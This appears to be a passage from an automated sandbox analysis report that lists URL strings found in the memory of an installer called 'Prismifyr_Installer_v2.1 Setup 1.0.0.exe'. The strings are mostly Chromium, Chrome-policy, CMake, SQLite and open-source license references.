Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cmake.org/Bug/view.php?id=6493
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cmake.org/pipermail/cmake/2010-July/038461.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.finesse.demon.co.uk/steven/sqrt.html.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.fossil-scm.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.gnu.org/software/make/manual/make.html#Syntax-of-Functions
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.gutenberg.org/ebooks/53).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.icu-project.org/userguide/posix.html#case_mappings
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.jclark.com/xt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.linux-usb.org/usb-ids.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/MPL/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/NPL/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_02
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.openradar.me/25313838
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opensource.apple.com/source/cctools/cctools-809/misc/libtool.c
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opensource.apple.com/source/distcc/distcc-2503/distcc_dist/include_server/headermap.py?tx
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opensource.org/licenses/bsd-license.php
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pertinentdetail.org/sqrt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.ploscompbiol.org/static/license
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.polymer-project.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.portaudio.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.softsynth.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.suitable.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.suitable.com/tools/smslib.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.suitable.com/tools/smslib.html&gt;
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.unicode.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xmlsoft.org/XSLT/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xmlsoft.org/XSLT/namespace
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xmlsoft.org/XSLT/namespacehttp://www.jclark.com/xtxsl:key
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xmlsoft.org/XSLT/xsltNewExtDef
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/Net.QuicStreamFactory.DefaultNetworkMatchNet.QuicSession.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://android.com/pay
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://android.googlesource.com/platform/external/puffin
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/uploadhttps://beacons.gvt2.com/domainreliability/uplo
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons2.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons3.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons4.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons5.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://beacons5.gvt3.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bit.ly/audio-worklet)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bit.ly/audio-worklet)..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.htmlMixed
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bugs.chromium.org/p/gyp/issues/detail?id=530
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=es&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=fa&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=fi&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=it&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=sk&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://chromestatus.com/feature/5105856067141632.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463431471.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461793535.0000000005944000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473941850.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462255144.0000000005946000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461642034.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472028493.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462894354.000000000594C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://chromium.googlesource.com/external/github.com/intel/tinycbor.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://code.google.com/p/gyp/issues/detail?id=411
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/1038223.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/1144908
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/1144908.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/1144908.The
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/1144908Changing
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/1429681
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/927119
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/927119..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/981419
